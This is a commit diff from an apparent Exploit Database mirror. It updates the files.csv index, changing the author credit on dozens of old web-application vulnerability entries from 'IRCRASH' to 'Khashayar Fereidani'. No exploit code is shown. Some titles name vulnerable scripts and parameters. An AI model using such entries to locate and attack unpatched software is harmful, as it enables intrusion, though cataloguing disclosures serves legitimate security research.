bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-12-30

Browse source 
10 new exploits
This commit is contained in:
Offensive Security 2015-12-30 05:02:54 +00:00
parent 73b5663d00
commit 2f4bedf752
11 changed files with 374 additions and 74 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

158
files.csv
View file

@ -4101,7 +4101,7 @@ id,file,description,date,author,platform,type,port
4454,platforms/php/webapps/4454.txt,"sk.log <= 0.5.3 (skin_url) Remote File Inclusion Vulnerability",2007-09-24,w0cker,php,webapps,0
4455,platforms/windows/remote/4455.pl,"Motorola Timbuktu Pro <= 8.6.5 File Deletion/Creation Exploit",2008-03-11,titon,windows,remote,0
4456,platforms/php/webapps/4456.txt,"FrontAccounting 1.13 - Remote File Inclusion Vulnerabilities",2007-09-26,kezzap66345,php,webapps,0
4457,platforms/php/webapps/4457.txt,"Softbiz Classifieds PLUS (id) Remote SQL Injection Vulnerability",2007-09-26,IRCRASH,php,webapps,0
4457,platforms/php/webapps/4457.txt,"Softbiz Classifieds PLUS (id) Remote SQL Injection Vulnerability",2007-09-26,"Khashayar Fereidani",php,webapps,0
4458,platforms/asp/webapps/4458.txt,"Novus 1.0 (notas.asp nota_id) Remote SQL Injection Vulnerability",2007-09-26,ka0x,asp,webapps,0
4459,platforms/php/webapps/4459.txt,"ActiveKB Knowledgebase 2.? (catId) Remote SQL Injection Vulnerability",2007-09-26,Luna-Tic/XTErner,php,webapps,0
4460,platforms/linux/local/4460.c,"Linux Kernel 2.4/2.6 x86-64 System Call Emulation Exploit",2007-09-27,"Robert Swiecki",linux,local,0
@ -4148,7 +4148,7 @@ id,file,description,date,author,platform,type,port
4501,platforms/php/webapps/4501.php,"PHP Homepage M 1.0 galerie.php Remote SQL Injection Exploit",2007-10-08,"[PHCN] Mahjong",php,webapps,0
4502,platforms/php/webapps/4502.txt,"xKiosk 3.0.1i (xkurl.php PEARPATH) Remote File Inclusion Vulnerability",2007-10-08,"BorN To K!LL",php,webapps,0
4503,platforms/php/webapps/4503.txt,"LiveAlbum 0.9.0 common.php Remote File Inclusion Vulnerability",2007-10-08,S.W.A.T.,php,webapps,0
4504,platforms/php/webapps/4504.txt,"Softbiz Jobs & Recruitment Remote SQL Injection Vulnerability",2007-10-08,IRCRASH,php,webapps,0
4504,platforms/php/webapps/4504.txt,"Softbiz Jobs & Recruitment Remote SQL Injection Vulnerability",2007-10-08,"Khashayar Fereidani",php,webapps,0
4505,platforms/php/webapps/4505.php,"LightBlog 8.4.1.1 - Remote Code Execution Exploit",2007-10-09,BlackHawk,php,webapps,0
4506,platforms/windows/remote/4506.html,"Microsoft Visual FoxPro 6.0 - FPOLE.OCX Arbitrary Command Execution",2007-10-09,shinnai,windows,remote,0
4507,platforms/php/webapps/4507.txt,"joomla component mp3 allopass 1.0 - Remote File Inclusion Vulnerability",2007-10-10,NoGe,php,webapps,0
@ -4171,7 +4171,7 @@ id,file,description,date,author,platform,type,port
4524,platforms/php/webapps/4524.txt,"joomla component com_colorlab 1.0 - Remote File Inclusion Vulnerability",2007-10-12,"Mehmet Ince",php,webapps,0
4525,platforms/php/webapps/4525.pl,"TikiWiki <= 1.9.8 tiki-graph_formula.php Command Execution Exploit",2007-10-12,str0ke,php,webapps,0
4526,platforms/windows/remote/4526.html,"PBEmail 7 - ActiveX Edition Insecure Method Exploit",2007-10-12,Katatafish,windows,remote,0
4527,platforms/php/webapps/4527.txt,"Softbiz Recipes Portal Script Remote SQL Injection Vulnerability",2007-10-13,IRCRASH,php,webapps,0
4527,platforms/php/webapps/4527.txt,"Softbiz Recipes Portal Script Remote SQL Injection Vulnerability",2007-10-13,"Khashayar Fereidani",php,webapps,0
4528,platforms/php/webapps/4528.txt,"KwsPHP 1.0 mg2 Module Remote SQL Injection Vulnerability",2007-10-13,"Mehmet Ince",php,webapps,0
4529,platforms/cgi/webapps/4529.txt,"WWWISIS <= 7.1 (IsisScript) Local File Disclosure / XSS Vulnerabilities",2007-10-13,JosS,cgi,webapps,0
4530,platforms/multiple/remote/4530.pl,"Apache Tomcat (webdav) - Remote File Disclosure Exploit",2007-10-14,eliteboy,multiple,remote,0
@ -4260,10 +4260,10 @@ id,file,description,date,author,platform,type,port
4614,platforms/php/webapps/4614.txt,"jPORTAL <= 2.3.1 articles.php Remote SQL Injection Vulnerability",2007-11-09,Alexsize,php,webapps,0
4615,platforms/multiple/dos/4615.txt,"MySQL <= 5.0.45 (Alter) Denial of Service Vulnerability",2007-11-09,"Kristian Hermansen",multiple,dos,0
4616,platforms/windows/remote/4616.pl,"Microsoft Internet Explorer - TIF/TIFF Code Execution (MS07-055)",2007-11-11,grabarz,windows,remote,0
4617,platforms/php/webapps/4617.txt,"Softbiz Auctions Script product_desc.php Remote SQL Injection Vuln",2007-11-11,IRCRASH,php,webapps,0
4618,platforms/php/webapps/4618.txt,"Softbiz Ad Management plus Script 1 - Remote SQL Injection Vuln",2007-11-11,IRCRASH,php,webapps,0
4619,platforms/php/webapps/4619.txt,"Softbiz Banner Exchange Network Script 1.0 - SQL Injection Vulnerability",2007-11-11,IRCRASH,php,webapps,0
4620,platforms/php/webapps/4620.txt,"Softbiz Link Directory Script Remote SQL Injection Vulnerability",2007-11-11,IRCRASH,php,webapps,0
4617,platforms/php/webapps/4617.txt,"Softbiz Auctions Script product_desc.php Remote SQL Injection Vuln",2007-11-11,"Khashayar Fereidani",php,webapps,0
4618,platforms/php/webapps/4618.txt,"Softbiz Ad Management plus Script 1 - Remote SQL Injection Vuln",2007-11-11,"Khashayar Fereidani",php,webapps,0
4619,platforms/php/webapps/4619.txt,"Softbiz Banner Exchange Network Script 1.0 - SQL Injection Vulnerability",2007-11-11,"Khashayar Fereidani",php,webapps,0
4620,platforms/php/webapps/4620.txt,"Softbiz Link Directory Script Remote SQL Injection Vulnerability",2007-11-11,"Khashayar Fereidani",php,webapps,0
4621,platforms/php/webapps/4621.txt,"patBBcode 1.0 bbcodeSource.php Remote File Inclusion Vulnerability",2007-11-12,p4sswd,php,webapps,0
4622,platforms/php/webapps/4622.txt,"Myspace Clone Script Remote SQL Injection Vulnerability",2007-11-13,t0pP8uZz,php,webapps,0
4623,platforms/php/webapps/4623.txt,"Toko Instan 7.6 - Multiple Remote SQL Injection Vulnerabilities",2007-11-14,k1tk4t,php,webapps,0
@ -4303,7 +4303,7 @@ id,file,description,date,author,platform,type,port
4657,platforms/windows/remote/4657.py,"Apple QuickTime 7.2/7.3 - RTSP Response Universal Exploit (IE7/FF/Opera)",2007-11-26,muts,windows,remote,0
4658,platforms/php/webapps/4658.php,"RunCMS <= 1.6 disclaimer.php Remote File Overwrite Exploit",2007-11-25,BugReport.IR,php,webapps,0
4659,platforms/php/webapps/4659.txt,"IAPR COMMENCE 1.3 - Multiple Remote File Inclusion Vulnerability",2007-11-25,ShAy6oOoN,php,webapps,0
4660,platforms/php/webapps/4660.pl,"Softbiz Freelancers Script 1 - Remote SQL Injection Exploit",2007-11-25,IRCRASH,php,webapps,0
4660,platforms/php/webapps/4660.pl,"Softbiz Freelancers Script 1 - Remote SQL Injection Exploit",2007-11-25,"Khashayar Fereidani",php,webapps,0
4661,platforms/php/webapps/4661.py,"DeluxeBB <= 1.09 - Remote Admin Email Change Exploit",2007-11-26,nexen,php,webapps,0
4662,platforms/php/webapps/4662.txt,"Tilde CMS <= 4.x - (aarstal) Remote SQL Injection Vulnerability",2007-11-26,KiNgOfThEwOrLd,php,webapps,0
4663,platforms/windows/remote/4663.html,"BitDefender Online Scanner 8 - ActiveX Heap Overflow Exploit",2007-11-27,Nphinity,windows,remote,0
@ -4554,10 +4554,10 @@ id,file,description,date,author,platform,type,port
4911,platforms/windows/dos/4911.c,"Cisco VPN Client IPSec Driver Local kernel system pool Corruption PoC",2008-01-15,mu-b,windows,dos,0
4912,platforms/php/webapps/4912.txt,"LulieBlog 1.0.1 (delete id) Remote Admin Bypass Vulnerability",2008-01-15,ka0x,php,webapps,0
4913,platforms/windows/remote/4913.html,"Macrovision FlexNet isusweb.dll DownloadAndExecute Method Exploit",2008-01-15,Elazar,windows,remote,0
4914,platforms/php/webapps/4914.txt,"FaScript FaMp3 1.0 - (show.php) Remote SQL Injection Vulnerability",2008-01-15,IRCRASH,php,webapps,0
4915,platforms/php/webapps/4915.txt,"FaScript FaName 1.0 - (page.php) Remote SQL Injection Vulnerability",2008-01-15,IRCRASH,php,webapps,0
4916,platforms/php/webapps/4916.txt,"FaScript FaPersian Petition (show.php) SQL Injection Vulnerability",2008-01-15,IRCRASH,php,webapps,0
4917,platforms/php/webapps/4917.txt,"FaScript FaPersianHack 1.0 - (show.php) SQL Injection Vulnerability",2008-01-15,IRCRASH,php,webapps,0
4914,platforms/php/webapps/4914.txt,"FaScript FaMp3 1.0 - (show.php) Remote SQL Injection Vulnerability",2008-01-15,"Khashayar Fereidani",php,webapps,0
4915,platforms/php/webapps/4915.txt,"FaScript FaName 1.0 - (page.php) Remote SQL Injection Vulnerability",2008-01-15,"Khashayar Fereidani",php,webapps,0
4916,platforms/php/webapps/4916.txt,"FaScript FaPersian Petition (show.php) SQL Injection Vulnerability",2008-01-15,"Khashayar Fereidani",php,webapps,0
4917,platforms/php/webapps/4917.txt,"FaScript FaPersianHack 1.0 - (show.php) SQL Injection Vulnerability",2008-01-15,"Khashayar Fereidani",php,webapps,0
4918,platforms/windows/remote/4918.html,"RTS Sentry Digital Surveillance (CamPanel.dll 2.1.0.2) BoF Exploit",2008-01-16,rgod,windows,remote,0
4919,platforms/php/webapps/4919.txt,"blogcms 4.2.1b (sql/XSS) Multiple Vulnerabilities",2008-01-16,DSecRG,php,webapps,0
4920,platforms/php/webapps/4920.txt,"Aria 0.99-6 (effect.php page) Local File Inclusion Vulnerability",2008-01-16,DSecRG,php,webapps,0
@ -4565,7 +4565,7 @@ id,file,description,date,author,platform,type,port
4922,platforms/php/webapps/4922.txt,"alitalk 1.9.1.1 - Multiple Vulnerabilities",2008-01-16,tomplixsee,php,webapps,0
4923,platforms/windows/remote/4923.txt,"miniweb 0.8.19 - Multiple Vulnerabilities",2008-01-16,"Hamid Ebadi",windows,remote,0
4924,platforms/php/webapps/4924.php,"PixelPost 1.7 - Remote Blind SQL Injection Exploit",2008-01-16,Silentz,php,webapps,0
4925,platforms/php/webapps/4925.txt,"PHP-RESIDENCE 0.7.2 (Search) Remote SQL Injection Vulnerability",2008-01-16,IRCRASH,php,webapps,0
4925,platforms/php/webapps/4925.txt,"PHP-RESIDENCE 0.7.2 (Search) Remote SQL Injection Vulnerability",2008-01-16,"Khashayar Fereidani",php,webapps,0
4926,platforms/php/webapps/4926.pl,"Gradman <= 0.1.3 (agregar_info.php) Local File Inclusion Exploit",2008-01-16,JosS,php,webapps,0
4927,platforms/php/webapps/4927.php,"MyBulletinBoard (MyBB) <= 1.2.10 - Remote Code Execution Exploit",2008-01-16,Silentz,php,webapps,0
4928,platforms/php/webapps/4928.txt,"mybulletinboard (mybb) <= 1.2.10 - Multiple Vulnerabilities",2008-01-16,waraxe,php,webapps,0
@ -4608,12 +4608,12 @@ id,file,description,date,author,platform,type,port
4965,platforms/php/webapps/4965.php,"PHP-Nuke <= 8.0 Final (sid) Remote SQL Injection Exploit",2008-01-22,RST/GHC,php,webapps,0
4966,platforms/php/webapps/4966.pl,"Invision Gallery <= 2.0.7 - Remote SQL Injection Exploit",2008-01-22,RST/GHC,php,webapps,0
4967,platforms/windows/remote/4967.html,"Lycos FileUploader Control ActiveX Remote Buffer Overflow Exploit",2008-01-22,Elazar,windows,remote,0
4968,platforms/php/webapps/4968.txt,"Foojan Wms 1.0 (index.php story) Remote SQL Injection Vulnerability",2008-01-23,IRCRASH,php,webapps,0
4969,platforms/php/webapps/4969.txt,"LulieBlog 1.02 (voircom.php id) Remote SQL Injection Vulnerability",2008-01-23,IRCRASH,php,webapps,0
4968,platforms/php/webapps/4968.txt,"Foojan Wms 1.0 (index.php story) Remote SQL Injection Vulnerability",2008-01-23,"Khashayar Fereidani",php,webapps,0
4969,platforms/php/webapps/4969.txt,"LulieBlog 1.02 (voircom.php id) Remote SQL Injection Vulnerability",2008-01-23,"Khashayar Fereidani",php,webapps,0
4970,platforms/asp/webapps/4970.txt,"Web Wiz Forums <= 9.07 (sub) Remote Directory Traversal Vulnerability",2008-01-23,BugReport.IR,asp,webapps,0
4971,platforms/asp/webapps/4971.txt,"web wiz rich text editor 4.0 - Multiple Vulnerabilities",2008-01-23,BugReport.IR,asp,webapps,0
4972,platforms/asp/webapps/4972.txt,"Web Wiz NewsPad 1.02 (sub) Remote Directory Traversal Vulnerability",2008-01-23,BugReport.IR,asp,webapps,0
4973,platforms/php/webapps/4973.txt,"Siteman 1.1.9 (cat) Remote File Disclosure Vulnerability",2008-01-23,IRCRASH,php,webapps,0
4973,platforms/php/webapps/4973.txt,"Siteman 1.1.9 (cat) Remote File Disclosure Vulnerability",2008-01-23,"Khashayar Fereidani",php,webapps,0
4974,platforms/windows/remote/4974.html,"Comodo AntiVirus 2.0 ExecuteStr() Remote Command Execution Exploit",2008-01-23,h07,windows,remote,0
4975,platforms/php/webapps/4975.txt,"SLAED CMS 2.5 Lite (newlang) Local File Inclusion Vulnerability",2008-01-23,The_HuliGun,php,webapps,0
4976,platforms/php/webapps/4976.txt,"Liquid-Silver CMS 0.1 (update) Local File Inclusion Vulnerability",2008-01-23,Stack,php,webapps,0
@ -4678,7 +4678,7 @@ id,file,description,date,author,platform,type,port
5039,platforms/php/webapps/5039.txt,"Wordpress Plugin Wordspew - Remote SQL Injection Vulnerability",2008-02-02,S@BUN,php,webapps,0
5040,platforms/php/webapps/5040.txt,"BookmarkX script 2007 (topicid) Remote SQL Injection Vulnerability",2008-02-02,S@BUN,php,webapps,0
5041,platforms/php/webapps/5041.txt,"phpShop <= 0.8.1 - Remote SQL Injection / Filter Bypass Vulnerabilities",2008-02-02,"the redc0ders",php,webapps,0
5042,platforms/php/webapps/5042.txt,"BlogPHP 2 - (id) XSS / Remote SQL Injection Exploit",2008-02-02,IRCRASH,php,webapps,0
5042,platforms/php/webapps/5042.txt,"BlogPHP 2 - (id) XSS / Remote SQL Injection Exploit",2008-02-02,"Khashayar Fereidani",php,webapps,0
5043,platforms/windows/dos/5043.html,"Yahoo! Music Jukebox 2.2 AddImage() ActiveX Remote BoF PoC Exploit",2008-02-02,h07,windows,dos,0
5044,platforms/windows/dos/5044.pl,"IpSwitch WS_FTP Server with SSH 6.1.0.0 - Remote Buffer Overflow PoC",2008-02-03,securfrog,windows,dos,0
5045,platforms/windows/remote/5045.html,"Sejoong Namo ActiveSquare 6 NamoInstaller.dll ActiveX BoF Exploit",2008-02-03,plan-s,windows,remote,0
@ -4686,7 +4686,7 @@ id,file,description,date,author,platform,type,port
5047,platforms/php/webapps/5047.txt,"Joomla Component mosDirectory 2.3.2 (catid) SQL Injection Vulnerability",2008-02-03,GoLd_M,php,webapps,0
5048,platforms/windows/remote/5048.html,"Yahoo! Music Jukebox 2.2 AddImage() ActiveX Remote BoF Exploit (2)",2008-02-03,exceed,windows,remote,0
5049,platforms/windows/remote/5049.html,"FaceBook PhotoUploader (ImageUploader4.ocx 4.5.57.0) BoF Exploit",2008-02-03,Elazar,windows,remote,0
5050,platforms/php/webapps/5050.pl,"A-Blog 2 - (id) XSS / Remote SQL Injection Exploit",2008-02-03,IRCRASH,php,webapps,0
5050,platforms/php/webapps/5050.pl,"A-Blog 2 - (id) XSS / Remote SQL Injection Exploit",2008-02-03,"Khashayar Fereidani",php,webapps,0
5051,platforms/windows/remote/5051.html,"Yahoo! Music Jukebox 2.2 AddButton() ActiveX Remote BoF Exploit (3)",2008-02-03,Elazar,windows,remote,0
5052,platforms/windows/remote/5052.html,"Yahoo! JukeBox MediaGrid ActiveX mediagrid.dll AddBitmap() BoF Exploit",2008-02-03,Elazar,windows,remote,0
5053,platforms/php/webapps/5053.txt,"Wordpress Plugin st_newsletter - Remote SQL Injection Vulnerability",2008-02-03,S@BUN,php,webapps,0
@ -4750,8 +4750,8 @@ id,file,description,date,author,platform,type,port
5111,platforms/windows/remote/5111.html,"IBM Domino Web Access Upload Module - SEH Overwrite Exploit",2008-02-13,Elazar,windows,remote,0
5112,platforms/jsp/webapps/5112.txt,"jspwiki 2.4.104 / 2.5.139 - Multiple Vulnerabilities",2008-02-13,"BugSec LTD",jsp,webapps,0
5113,platforms/hardware/remote/5113.txt,"Philips VOIP841 (Firmware <= 1.0.4.800) Multiple Vulnerabilities",2008-02-14,ikki,hardware,remote,0
5114,platforms/php/webapps/5114.pl,"Affiliate Market 0.1 BETA - XSS / SQL Injection Exploit",2008-02-14,IRCRASH,php,webapps,0
5115,platforms/php/webapps/5115.txt,"nuBoard 0.5 (threads.php ssid) SQL Injection Vulnerability",2008-02-14,IRCRASH,php,webapps,0
5114,platforms/php/webapps/5114.pl,"Affiliate Market 0.1 BETA - XSS / SQL Injection Exploit",2008-02-14,"Khashayar Fereidani",php,webapps,0
5115,platforms/php/webapps/5115.txt,"nuBoard 0.5 (threads.php ssid) SQL Injection Vulnerability",2008-02-14,"Khashayar Fereidani",php,webapps,0
5116,platforms/php/webapps/5116.txt,"artmedic weblog 1.0 - Multiple Local File Inclusion Vulnerabilities",2008-02-14,muuratsalo,php,webapps,0
5117,platforms/php/webapps/5117.txt,"Joomla Component paxxgallery 0.2 (iid) SQL Injection Vulnerability",2008-02-14,S@BUN,php,webapps,0
5118,platforms/php/webapps/5118.txt,"Joomla Component MCQuiz 0.9 Final (tid) SQL Injection Vulnerability",2008-02-14,S@BUN,php,webapps,0
@ -4963,10 +4963,10 @@ id,file,description,date,author,platform,type,port
5328,platforms/php/webapps/5328.txt,"phpSpamManager 0.53b (body.php) Remote File Disclosure Vulnerability",2008-03-31,GoLd_M,php,webapps,0
5329,platforms/php/webapps/5329.txt,"Woltlab Burning Board Addon JGS-Treffen SQL Injection Vulnerability",2008-03-31,N/A,php,webapps,0
5330,platforms/windows/remote/5330.c,"Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (Win32)",2008-03-31,Heretic2,windows,remote,80
5331,platforms/php/webapps/5331.pl,"Neat weblog 0.2 (articleId) Remote SQL Injection Vulnerability",2008-03-31,IRCRASH,php,webapps,0
5331,platforms/php/webapps/5331.pl,"Neat weblog 0.2 (articleId) Remote SQL Injection Vulnerability",2008-03-31,"Khashayar Fereidani",php,webapps,0
5332,platforms/windows/remote/5332.html,"Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit",2008-04-01,Elazar,windows,remote,0
5333,platforms/php/webapps/5333.txt,"EasyNews 40tr (SQL/XSS/LFI) Remote SQL Injection Exploit",2008-04-01,IRCRASH,php,webapps,0
5334,platforms/php/webapps/5334.txt,"FaScript FaPhoto 1.0 - (show.php id) SQL Injection Vulnerability",2008-04-01,IRCRASH,php,webapps,0
5333,platforms/php/webapps/5333.txt,"EasyNews 40tr (SQL/XSS/LFI) Remote SQL Injection Exploit",2008-04-01,"Khashayar Fereidani",php,webapps,0
5334,platforms/php/webapps/5334.txt,"FaScript FaPhoto 1.0 - (show.php id) SQL Injection Vulnerability",2008-04-01,"Khashayar Fereidani",php,webapps,0
5335,platforms/php/webapps/5335.txt,"Mambo Component ahsShop <= 1.51 (vara) SQL Injection Vulnerability",2008-04-01,S@BUN,php,webapps,0
5336,platforms/php/webapps/5336.pl,"eggBlog 4.0 Password Retrieve Remote SQL Injection Exploit",2008-04-01,girex,php,webapps,0
5337,platforms/php/webapps/5337.txt,"Joomla Component actualite 1.0 (id) SQL Injection Vulnerability",2008-04-01,Stack,php,webapps,0
@ -5130,7 +5130,7 @@ id,file,description,date,author,platform,type,port
5496,platforms/windows/remote/5496.html,"WatchFire Appscan 7.0 - ActiveX Multiple Insecure Methods Exploit",2008-04-25,callAX,windows,remote,0
5497,platforms/php/webapps/5497.txt,"Joomla Component Joomla-Visites 1.1 RC2 RFI Vulnerability",2008-04-25,NoGe,php,webapps,0
5498,platforms/windows/local/5498.py,"Kantaris 0.3.4 SSA Subtitle Local Buffer Overflow Exploit",2008-04-25,j0rgan,windows,local,0
5499,platforms/php/webapps/5499.txt,"siteman 2.x (exec/lfi/XSS) Multiple Vulnerabilities",2008-04-26,IRCRASH,php,webapps,0
5499,platforms/php/webapps/5499.txt,"siteman 2.x (exec/lfi/XSS) Multiple Vulnerabilities",2008-04-26,"Khashayar Fereidani",php,webapps,0
5500,platforms/php/webapps/5500.txt,"PostNuke Module pnFlashGames <= 2.5 - SQL Injection Vulnerabilities",2008-04-26,Kacper,php,webapps,0
5501,platforms/php/webapps/5501.txt,"Content Management System for Phprojekt 0.6.1 RFI Vulnerabiltiies",2008-04-26,RoMaNcYxHaCkEr,php,webapps,0
5502,platforms/php/webapps/5502.pl,"Clever Copy 3.0 (postview.php) Remote SQL Injection Exploit",2008-04-26,U238,php,webapps,0
@ -5159,8 +5159,8 @@ id,file,description,date,author,platform,type,port
5525,platforms/php/webapps/5525.txt,"Harris WapChat 1 - Multiple Remote File Inclusion Vulnerabilities",2008-04-30,k1n9k0ng,php,webapps,0
5526,platforms/php/webapps/5526.txt,"interact 2.4.1 - Multiple Remote File Inclusion Vulnerabilities",2008-04-30,RoMaNcYxHaCkEr,php,webapps,0
5527,platforms/php/webapps/5527.pl,"Joomla Component Webhosting (catid) Blind SQL Injection Exploit",2008-05-01,cO2,php,webapps,0
5528,platforms/php/webapps/5528.txt,"ActualAnalyzer Lite (free) 2.78 - Local File Inclusion Vulnerability",2008-05-01,IRCRASH,php,webapps,0
5529,platforms/php/webapps/5529.txt,"vlbook 1.21 (xss/lfi) Multiple Vulnerabilities",2008-05-01,IRCRASH,php,webapps,0
5528,platforms/php/webapps/5528.txt,"ActualAnalyzer Lite (free) 2.78 - Local File Inclusion Vulnerability",2008-05-01,"Khashayar Fereidani",php,webapps,0
5529,platforms/php/webapps/5529.txt,"vlbook 1.21 (xss/lfi) Multiple Vulnerabilities",2008-05-01,"Khashayar Fereidani",php,webapps,0
5530,platforms/windows/remote/5530.html,"Microsoft Works 7 WkImgSrv.dll ActiveX Remote BoF Exploit",2008-05-02,lhoang8500,windows,remote,0
5531,platforms/php/webapps/5531.txt,"Open Auto Classifieds 1.4.3b Remote SQL Injection Vulnerabilities",2008-05-02,InjEctOr5,php,webapps,0
5532,platforms/php/webapps/5532.txt,"ItCMS 1.9 (boxpop.php) Remote Code Execution Vulnerability",2008-05-02,Cod3rZ,php,webapps,0
@ -5754,7 +5754,7 @@ id,file,description,date,author,platform,type,port
6139,platforms/php/webapps/6139.txt,"EPShop < 3.0 (pid) Remote SQL Injection Vulnerability",2008-07-26,mikeX,php,webapps,0
6140,platforms/php/webapps/6140.txt,"phpLinkat 0.1 Insecure Cookie Handling / SQL Injection Vulnerability",2008-07-26,"Encrypt3d.M!nd ",php,webapps,0
6141,platforms/php/webapps/6141.txt,"TriO <= 2.1 (browse.php id) Remote SQL Injection Vulnerability",2008-07-26,dun,php,webapps,0
6142,platforms/php/webapps/6142.txt,"CMScout 2.05 (common.php bit) Local File Inclusion Vulnerability",2008-07-27,IRCRASH,php,webapps,0
6142,platforms/php/webapps/6142.txt,"CMScout 2.05 (common.php bit) Local File Inclusion Vulnerability",2008-07-27,"Khashayar Fereidani",php,webapps,0
6143,platforms/php/webapps/6143.txt,"Getacoder clone (sb_protype) Remote SQL Injection Vulnerability",2008-07-27,"Hussin X",php,webapps,0
6144,platforms/php/webapps/6144.txt,"GC Auction Platinum (cate_id) Remote SQL Injection Vulnerability",2008-07-27,"Hussin X",php,webapps,0
6145,platforms/php/webapps/6145.txt,"SiteAdmin CMS (art) Remote SQL Injection Vulnerability",2008-07-27,Cr@zy_King,php,webapps,0
@ -5765,7 +5765,7 @@ id,file,description,date,author,platform,type,port
6150,platforms/php/webapps/6150.txt,"PixelPost 1.7.1 (language_full) Local File Inclusion Vulnerability",2008-07-28,DSecRG,php,webapps,0
6151,platforms/windows/remote/6151.txt,"velocity web-server 1.0 - Directory Traversal file download Vulnerability",2008-07-28,DSecRG,windows,remote,0
6152,platforms/windows/remote/6152.html,"Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control BoF Exploit",2008-07-28,Elazar,windows,remote,0
6153,platforms/php/webapps/6153.txt,"ATutor <= 1.6.1-pl1 (import.php) Remote File Inclusion Vulnerability",2008-07-28,IRCRASH,php,webapps,0
6153,platforms/php/webapps/6153.txt,"ATutor <= 1.6.1-pl1 (import.php) Remote File Inclusion Vulnerability",2008-07-28,"Khashayar Fereidani",php,webapps,0
6154,platforms/php/webapps/6154.txt,"ViArt Shop <= 3.5 (category_id) Remote SQL Injection Vulnerability",2008-07-28,"GulfTech Security",php,webapps,0
6155,platforms/hardware/remote/6155.c,"Cisco IOS 12.3(18) FTP Server - Remote Exploit (attached to gdb)",2008-07-29,"Andy Davis",hardware,remote,0
6156,platforms/php/webapps/6156.txt,"Minishowcase 09b136 (lang) Local File Inclusion Vulnerability",2008-07-29,DSecRG,php,webapps,0
@ -5776,7 +5776,7 @@ id,file,description,date,author,platform,type,port
6161,platforms/php/webapps/6161.txt,"HIOX Random Ad 1.3 (hioxRandomAd.php hm) RFI Vulnerability",2008-07-30,"Ghost Hacker",php,webapps,0
6162,platforms/php/webapps/6162.txt,"hiox browser statistics 2.0 - Remote File Inclusion Vulnerability",2008-07-30,"Ghost Hacker",php,webapps,0
6163,platforms/php/webapps/6163.txt,"PHP Hosting Directory 2.0 Insecure Cookie Handling Vulnerability",2008-07-30,Stack,php,webapps,0
6164,platforms/php/webapps/6164.txt,"nzFotolog 0.4.1 (action_file) Local File Inclusion Vulnerability",2008-07-30,IRCRASH,php,webapps,0
6164,platforms/php/webapps/6164.txt,"nzFotolog 0.4.1 (action_file) Local File Inclusion Vulnerability",2008-07-30,"Khashayar Fereidani",php,webapps,0
6165,platforms/php/webapps/6165.txt,"ZeeReviews (comments.php ItemID) Remote SQL Injection Vulnerability",2008-07-30,Mr.SQL,php,webapps,0
6166,platforms/php/webapps/6166.php,"HIOX Random Ad 1.3 - Arbitrary Add Admin User Exploit",2008-07-30,Stack,php,webapps,0
6167,platforms/php/webapps/6167.txt,"Article Friendly Pro/Standard (Cat) Remote SQL Injection Vulnerability",2008-07-30,Mr.SQL,php,webapps,0
@ -5803,7 +5803,7 @@ id,file,description,date,author,platform,type,port
6188,platforms/windows/local/6188.c,"IrfanView <= 3.99 IFF File Local Stack Buffer Overflow Exploit",2008-08-01,"fl0 fl0w",windows,local,0
6189,platforms/php/webapps/6189.txt,"GreenCart PHP Shopping Cart (id) Remote SQL Injection Vulnerability",2008-08-01,"Hussin X",php,webapps,0
6190,platforms/php/webapps/6190.txt,"phsBlog 0.1.1 - Multiple Remote SQL Injection Vulnerabilities",2008-08-01,cOndemned,php,webapps,0
6191,platforms/php/webapps/6191.txt,"e-vision CMS <= 2.02 (sql/upload/ig) Multiple Vulnerabilities",2008-08-02,IRCRASH,php,webapps,0
6191,platforms/php/webapps/6191.txt,"e-vision CMS <= 2.02 (sql/upload/ig) Multiple Vulnerabilities",2008-08-02,"Khashayar Fereidani",php,webapps,0
6192,platforms/php/webapps/6192.txt,"k-links directory (sql/XSS) Multiple Vulnerabilities",2008-08-02,Corwin,php,webapps,0
6193,platforms/php/webapps/6193.txt,"E-Store Kit- <= 2 PayPal Edition - (pid) SQL Injection Vulnerability",2008-08-02,Mr.SQL,php,webapps,0
6194,platforms/php/webapps/6194.pl,"moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit",2008-08-02,Ams,php,webapps,0
@ -5839,7 +5839,7 @@ id,file,description,date,author,platform,type,port
6229,platforms/multiple/remote/6229.txt,"apache tomcat < 6.0.18 utf8 - Directory Traversal Vulnerability",2008-08-11,"Simon Ryeo",multiple,remote,0
6230,platforms/php/webapps/6230.txt,"ZeeBuddy 2.1 (bannerclick.php adid) SQL Injection Vulnerability",2008-08-11,"Hussin X",php,webapps,0
6231,platforms/php/webapps/6231.txt,"Ppim <= 1.0 (upload/change password) Multiple Vulnerabilities",2008-08-11,Stack,php,webapps,0
6232,platforms/php/webapps/6232.txt,"Ovidentia 6.6.5 (item) Remote SQL Injection Vulnerability",2008-08-11,IRCRASH,php,webapps,0
6232,platforms/php/webapps/6232.txt,"Ovidentia 6.6.5 (item) Remote SQL Injection Vulnerability",2008-08-11,"Khashayar Fereidani",php,webapps,0
6233,platforms/php/webapps/6233.txt,"BBlog 0.7.6 (mod) Remote SQL Injection Vulnerability",2008-08-12,IP-Sh0k,php,webapps,0
6234,platforms/php/webapps/6234.txt,"Joomla 1.5.x - (Token) Remote Admin Change Password Vulnerability",2008-08-12,d3m0n,php,webapps,0
6235,platforms/php/webapps/6235.txt,"gelato CMS 0.95 (img) Remote File Disclosure Vulnerability",2008-08-13,JIKO,php,webapps,0
@ -5852,7 +5852,7 @@ id,file,description,date,author,platform,type,port
6247,platforms/php/webapps/6247.txt,"dotCMS 1.6 (id) Multiple Local File Inclusion Vulnerabilities",2008-08-15,Don,php,webapps,0
6248,platforms/windows/remote/6248.pl,"FlashGet 1.9.0.1012 (FTP PWD Response) SEH STACK Overflow Exploit",2008-08-15,SkOd,windows,remote,21
6249,platforms/php/webapps/6249.txt,"ZEEJOBSITE 2.0 (adid) Remote SQL Injection Vulnerability",2008-08-15,"Hussin X",php,webapps,0
6250,platforms/php/webapps/6250.txt,"deeemm CMS (dmcms) 0.7.4 - Multiple Vulnerabilities",2008-08-15,IRCRASH,php,webapps,0
6250,platforms/php/webapps/6250.txt,"deeemm CMS (dmcms) 0.7.4 - Multiple Vulnerabilities",2008-08-15,"Khashayar Fereidani",php,webapps,0
